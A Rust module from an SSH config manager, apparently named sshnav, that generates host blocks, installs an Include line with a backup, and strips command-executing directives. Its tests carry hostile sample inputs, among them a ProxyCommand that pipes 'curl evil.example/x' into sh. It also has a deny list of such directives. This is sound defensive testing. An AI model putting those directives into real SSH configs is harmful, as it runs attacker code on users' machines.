use crate::inventory::{Host, Inventory};
use anyhow::{Context, Result};
use std::fs;
use std::path::Path;
use std::time::{SystemTime, UNIX_EPOCH};

pub const INCLUDE_LINE: &str = "Include ~/.ssh/sshnav.generated";

pub fn render(inventory: &Inventory) -> Result<String> {
    inventory.validate()?;
    let mut out = String::from("# Generated by sshnav. Edit sshnav's database, not this file.\n\n");

    for host in &inventory.hosts {
        out.push_str(&render_host(host));
        out.push('\n');
    }

    Ok(out)
}

pub fn write_generated(inventory: &Inventory, path: &Path) -> Result<()> {
    if let Some(parent) = path.parent() {
        fs::create_dir_all(parent)
            .with_context(|| format!("could not create {}", parent.display()))?;
    }
    fs::write(path, render(inventory)?)
        .with_context(|| format!("could not write generated config at {}", path.display()))?;
    Ok(())
}

pub fn install_include(ssh_config: &Path) -> Result<bool> {
    if let Some(parent) = ssh_config.parent() {
        fs::create_dir_all(parent)
            .with_context(|| format!("could not create {}", parent.display()))?;
    }

    let existing = fs::read_to_string(ssh_config).unwrap_or_default();
    if has_include(&existing) {
        return Ok(false);
    }

    if ssh_config.exists() {
        let backup = ssh_config.with_extension(format!("bak.{}", timestamp()));
        fs::copy(ssh_config, &backup).with_context(|| {
            format!(
                "could not create backup {} before editing {}",
                backup.display(),
                ssh_config.display()
            )
        })?;
    }

    let mut next = existing;
    if !next.is_empty() && !next.ends_with('\n') {
        next.push('\n');
    }
    next.push_str(INCLUDE_LINE);
    next.push('\n');
    fs::write(ssh_config, next)
        .with_context(|| format!("could not write ssh config at {}", ssh_config.display()))?;
    Ok(true)
}

pub fn has_include(contents: &str) -> bool {
    contents.lines().any(|line| {
        let trimmed = line.trim();
        !trimmed.starts_with('#') && trimmed.eq_ignore_ascii_case(INCLUDE_LINE)
    })
}

fn render_host(host: &Host) -> String {
    let mut out = String::new();
    out.push_str("Host ");
    out.push_str(&host.alias);
    out.push('\n');
    out.push_str("    HostName ");
    out.push_str(&host.hostname);
    out.push('\n');

    if let Some(user) = &host.user {
        push_directive(&mut out, "User", user);
    }
    if let Some(port) = host.port {
        push_directive(&mut out, "Port", &port.to_string());
    }
    if !host.has_private_key
        && let Some(identity_file) = &host.private_key_source_path
    {
        push_directive(&mut out, "IdentityFile", identity_file);
    } else if host.has_private_key {
        out.push_str("    # IdentityFile managed by sshnav encrypted key store\n");
    }
    if let Some(proxy_jump) = &host.proxy_jump {
        push_directive(&mut out, "ProxyJump", proxy_jump);
    }
    for forward in &host.local_forwards {
        push_directive(&mut out, "LocalForward", forward);
    }
    for forward in &host.remote_forwards {
        push_directive(&mut out, "RemoteForward", forward);
    }
    for forward in &host.dynamic_forwards {
        push_directive(&mut out, "DynamicForward", forward);
    }
    for option in &host.options {
        if is_command_executing_directive(option) {
            out.push_str("    # sshnav: skipped imported directive that can execute a command: ");
            out.push_str(option);
            out.push('\n');
            continue;
        }
        out.push_str("    ");
        out.push_str(option);
        out.push('\n');
    }

    out
}

fn push_directive(out: &mut String, key: &str, value: &str) {
    out.push_str("    ");
    out.push_str(key);
    out.push(' ');
    out.push_str(value);
    out.push('\n');
}

/// OpenSSH directives that run an arbitrary command as a side effect of
/// resolving or connecting to a host. `sshnav generate` writes into a file
/// that gets `Include`d into the user's real `~/.ssh/config`, so an
/// imported directive here would run outside of sshnav's own argv
/// construction and its `is_safe_option` allowlist (see `runner.rs`).
fn is_command_executing_directive(option: &str) -> bool {
    let Some((key, _)) = option.split_once(char::is_whitespace) else {
        return false;
    };
    matches!(
        key.to_ascii_lowercase().as_str(),
        "proxycommand"
            | "localcommand"
            | "permitlocalcommand"
            | "remotecommand"
            | "knownhostscommand"
            | "match"
            | "include"
    )
}

fn timestamp() -> u64 {
    SystemTime::now()
        .duration_since(UNIX_EPOCH)
        .map(|duration| duration.as_secs())
        .unwrap_or_default()
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::inventory::{Host, Inventory};
    use tempfile::tempdir;

    #[test]
    fn generated_config_contains_expected_block() {
        let mut inventory = Inventory::default();
        let mut host = Host::new("prod-db".into(), "10.0.0.10".into());
        host.user = Some("ubuntu".into());
        host.port = Some(22);
        host.private_key_source_path = Some("~/.ssh/prod".into());
        host.options = vec!["ServerAliveInterval 60".into()];
        inventory.hosts.push(host);

        let rendered = render(&inventory).unwrap();

        assert!(rendered.contains("Host prod-db\n"));
        assert!(rendered.contains("    HostName 10.0.0.10\n"));
        assert!(rendered.contains("    User ubuntu\n"));
        assert!(rendered.contains("    IdentityFile ~/.ssh/prod\n"));
        assert!(rendered.contains("    ServerAliveInterval 60\n"));
    }

    #[test]
    fn generated_config_does_not_reference_encrypted_key_source() {
        let mut inventory = Inventory::default();
        let mut host = Host::new("prod-db".into(), "10.0.0.10".into());
        host.has_private_key = true;
        host.user = Some("ubuntu".into());
        host.private_key_source_path = Some("/home/me/prod".into());
        inventory.hosts.push(host);

        let rendered = render(&inventory).unwrap();

        assert!(rendered.contains("Host prod-db\n"));
        assert!(rendered.contains("# IdentityFile managed by sshnav encrypted key store"));
        assert!(!rendered.contains("/home/me/prod"));
    }

    #[test]
    fn generated_config_skips_command_executing_directives() {
        let mut inventory = Inventory::default();
        let mut host = Host::new("prod-db".into(), "10.0.0.10".into());
        host.user = Some("ubuntu".into());
        host.options = vec![
            "ProxyCommand sh -c 'curl evil.example/x | sh'".into(),
            "LocalCommand touch /tmp/pwned".into(),
            "PermitLocalCommand yes".into(),
            "RemoteCommand id".into(),
            "KnownHostsCommand /tmp/evil".into(),
            "ServerAliveInterval 60".into(),
        ];
        inventory.hosts.push(host);

        let rendered = render(&inventory).unwrap();

        assert!(!rendered.contains("    ProxyCommand sh -c"));
        assert!(!rendered.contains("    LocalCommand touch"));
        assert!(!rendered.contains("    PermitLocalCommand yes\n"));
        assert!(!rendered.contains("    RemoteCommand id\n"));
        assert!(!rendered.contains("    KnownHostsCommand /tmp/evil\n"));
        assert!(rendered.contains("    ServerAliveInterval 60\n"));
        assert!(rendered.contains("# sshnav: skipped imported directive"));
        assert!(rendered.contains("ProxyCommand sh -c"));
        assert_eq!(
            rendered
                .matches("# sshnav: skipped imported directive")
                .count(),
            5
        );
    }

    #[test]
    fn install_include_is_idempotent_and_backs_up() {
        let dir = tempdir().unwrap();
        let config = dir.path().join("config");
        fs::write(&config, "Host old\n    HostName old\n").unwrap();

        assert!(install_include(&config).unwrap());
        assert!(!install_include(&config).unwrap());

        let contents = fs::read_to_string(&config).unwrap();
        assert_eq!(contents.matches(INCLUDE_LINE).count(), 1);
        let backups = fs::read_dir(dir.path())
            .unwrap()
            .filter_map(Result::ok)
            .filter(|entry| {
                entry
                    .file_name()
                    .to_string_lossy()
                    .starts_with("config.bak.")
            })
            .count();
        assert_eq!(backups, 1);
    }
}
